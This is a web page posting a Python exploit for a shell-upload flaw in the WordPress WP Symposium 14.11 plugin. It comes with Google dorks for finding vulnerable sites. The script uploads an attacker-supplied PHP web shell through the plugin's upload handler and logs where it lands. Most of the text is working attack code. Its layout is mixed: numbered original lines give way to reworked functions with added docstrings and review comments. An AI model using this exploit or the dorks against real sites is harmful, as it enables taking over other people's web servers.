Googleinurl

[EXPLOIT]Sh311 Upl04d Vuln3r4b1l1ty Wp-Symposium v14.11

Dec 11th, 2014
  1. #!/usr/bin/python
  2. #-------------------------------------------------------------------------------
  3. # Exploit Name: Wordpress WP Symposium 14.11 Shell Upload Vulnerability
  4. # Vulnerability discovered by Claudio Viviani - http://www.homelab.it
  5. # Exploit written by Claudio Viviani / Edited INURL - BRASIL
  6. # 2014-11-27:  Discovered vulnerability
  7. # 2014-12-01:  Vendor Notification (Twitter)
  8. # 2014-12-02:  Vendor Notification (Web Site)
  9. # 2014-12-04:  Vendor Notification (E-mail)
  10. # 2014-12-11:  No Response/Feedback
  11. # 2014-12-11:  Published
  12. # DORK:  index of "wp-symposium"
  13. # DORK:  inurl:"plugins/wp-symposium" -site:wordpress.org
  14. # Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs
  15. #-------------------------------------------------------------------------------
  16. import urllib, urllib2, socket
  17. import sys
  18. import string, random
  19. import optparse
  20. import os, os.path, mimetypes
  21. import datetime
  22. import os
  23.  
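def checkurl(url):
    """Return *url* unchanged if it carries an explicit http:// or https:// scheme.

    The upload URL is later built by plain string concatenation on top of this
    value, so a bare hostname would produce an unusable request; reject it early.

    Args:
        url: target base URL given on the command line (-t).

    Returns:
        The same string when it starts with "http://" or "https://".

    Raises:
        SystemExit: with status 1, after printing an error, when the scheme is
        missing.
    """
    if not url.startswith(("http://", "https://")):
        # Fix: the original message misspelled "protocol" as "procotol".
        print('[X] You must insert http:// or https:// protocol')
        sys.exit(1)
    return url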
  30.  
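def checkfile(file):
    """Return *file* if it is an existing, readable regular file; otherwise exit.

    Bug fix: the original joined the two tests with ``and``, so a path that
    existed but was unreadable, or was a directory, passed the check and only
    blew up later inside open(). Either condition is now enough to reject it,
    which is what the error message already promised.

    Args:
        file: path of the payload given on the command line (-f).

    Returns:
        The same path string.

    Raises:
        SystemExit: with status 1, after printing an error, when the path is
        not a readable regular file.
    """
    if not os.path.isfile(file) or not os.access(file, os.R_OK):
        print('[X] ' + file + ' file is missing or not readable')
        sys.exit(1)
    return file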
  37. # Get file's mimetype
def get_content_type(filename):
    """Guess a MIME type for *filename* from its extension.

    Falls back to the generic ``application/octet-stream`` whenever
    :func:`mimetypes.guess_type` cannot classify the name.
    """
    guessed, _encoding = mimetypes.guess_type(filename)
    if guessed:
        return guessed
    return 'application/octet-stream'
  40.  
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    """Produce a random alphanumeric string (used for the upload dir/file names).

    Args:
        size: number of characters to draw (default 6).
        chars: alphabet to draw from (default A-Z, a-z, 0-9).

    Returns:
        ``size`` characters, each picked independently from ``chars`` with
        :func:`random.choice` (the stdlib PRNG, not a CSPRNG).
    """
    # One random.choice call per position, in order, exactly like a loop would do.
    return ''.join(map(random.choice, [chars] * size))
  43.  
  44.  
  45. # Create multipart header
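def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
    """Build the multipart/form-data body for the single upload request.

    The body carries three plain fields (``uploader_uid``, ``uploader_dir``,
    ``uploader_url``) followed by one file part named ``files[]`` whose
    filename is ``randShellName + ".php"`` and whose content is the local
    payload file. The boundary string here must equal the one in the
    module-level ``content_type`` header.

    Args:
        payloadname: path of the local file whose contents become the file part.
        randDirName: value of the ``uploader_dir`` field (sent as "./" + name).
        randShellName: basename of the uploaded file (".php" is appended).

    Returns:
        The whole body as one CRLF-joined string.

    Notes:
        Reads the module-level ``url_symposium_upload``; call it only after
        that variable is assigned. Fix over the original: the payload file is
        opened in a ``with`` block so its handle is always closed.
    """
    getfields = dict()
    getfields['uploader_uid'] = '1'
    getfields['uploader_dir'] = './' + randDirName
    getfields['uploader_url'] = url_symposium_upload

    # Close the handle deterministically instead of leaking it until GC.
    with open(payloadname) as payload_fh:
        payloadcontent = payload_fh.read()

    LIMIT = '----------lImIt_of_THE_fIle_eW_$'
    CRLF = '\r\n'

    L = []
    for (key, value) in getfields.items():
        L.append('--' + LIMIT)
        L.append('Content-Disposition: form-data; name="%s"' % key)
        L.append('')
        L.append(value)

    L.append('--' + LIMIT)
    L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName + ".php"))
    L.append('Content-Type: %s' % get_content_type(payloadname))
    L.append('')
    L.append(payloadcontent)
    L.append('--' + LIMIT + '--')
    L.append('')
    return CRLF.join(L)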
  74.  
# --- Main script -------------------------------------------------------------
# Flow: parse -t/-f/--timeout, validate them, send one multipart POST to
# <target>/wp-content/plugins/wp-symposium/server/php/index.php with the
# payload as the "files[]" part, then print and log the guessed location.
# Python 2 only (urllib2, print statement in checkfile). Use only against
# systems you are explicitly authorized to test.
banner = """
0x[EXPLOIT NAME]: Sh311 Upl04d Vuln3r4b1l1ty Wp-Symposium v14.11 / INURL - BRASIL
------------------------------------------------------------------------------------------------------------------
"""

# Command-line options: -t and -f are mandatory (checked below); --timeout is in seconds.
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-f', '--file', action="store",
                  help="Insert file name, ex: shell.php",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )

options, remainder = commandList.parse_args()

# Check args
if not options.target or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)

payloadname = checkfile(options.file)   # exits unless the payload path is usable
host = checkurl(options.target)         # exits unless an http(s):// scheme is given
timeout = options.timeout

print(banner)

# Applies to every socket urllib2 opens below (connect and read).
socket.setdefaulttimeout(timeout)

# Plugin upload-handler directory; create_body_sh3ll_upl04d() reads this global.
url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'

# The boundary here must equal LIMIT inside create_body_sh3ll_upl04d().
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'

# Random names for the uploader_dir field and the uploaded .php basename.
randDirName = id_generator()
randShellName = id_generator()

bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)

# Browser-like User-Agent; Content-Length is the length of the (Python 2 str) body.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
           'content-type': content_type,
           'content-length': str(len(bodyupload)) }

try:
    req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
    # NOTE(review): the response is never closed; call response.close() after
    # read() (or wrap it in contextlib.closing).
    response = urllib2.urlopen(req)
    read = response.read()

    # Success heuristic: any body that is non-empty, is not "0" and does not
    # contain the substring "error" is reported as an upload. A 200 HTML page
    # (login form, WAF block page) would therefore be misreported as success;
    # confirm the printed location manually.
    if "error" in read or read == "0" or read == "":
       now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
       print('0x' + str(now) + '[INFO][NOT VULN]: Upload Failed')
    else:
       now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
       print('0x' + str(now) + '[INFO][VALUE]: Shell Uploaded')
       now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
       # The location joins randDirName and randShellName with no "/" between
       # them; presumably this mirrors how the handler concatenates
       # uploader_dir and the filename on the server — verify against the plugin.
       print('0x' + str(now) + '[INFO][VALUE]: Location: '+url_symposium_upload+randDirName+randShellName+'.php')
       file_saved = 'poffOUTPUT_Sh311_Upl04d_Vuln3r4b1l1ty.txt'

       msg = '0x[INFO][FILE SAVED]: '+file_saved + "\n"
       url_saved = url_symposium_upload+randDirName+randShellName+".php\n"
    # NOTE(review): this block sits outside the else branch above, so on the
    # "Upload Failed" path file_saved/msg/url_saved are unbound and a NameError
    # escapes (only HTTPError/URLError are caught below). It should be indented
    # under the else branch. Both arms also do the same thing: open(file_saved,
    # 'a') already creates a missing file, so a single with-open 'a' suffices.
    if os.path.exists(file_saved):
       arquivo = open(file_saved, 'a')
       arquivo.write(url_saved)
       arquivo.close()
       print(msg)
    else:
       arquivo = open(file_saved, 'w')
       arquivo.write(url_saved)
       arquivo.close()
       print(msg)

# Non-2xx responses (e.g. 404 when the plugin is absent, 403 from a WAF).
except urllib2.HTTPError as e:
    now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    print('0x' + str(now) + '[INFO][ERROR]: '+str(e))
# DNS/connect/TLS failures and the socket timeout set above.
except urllib2.URLError as e:
    now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    print('0x' + str(now) + '[INFO][ERROR]: Connection Error: '+str(e))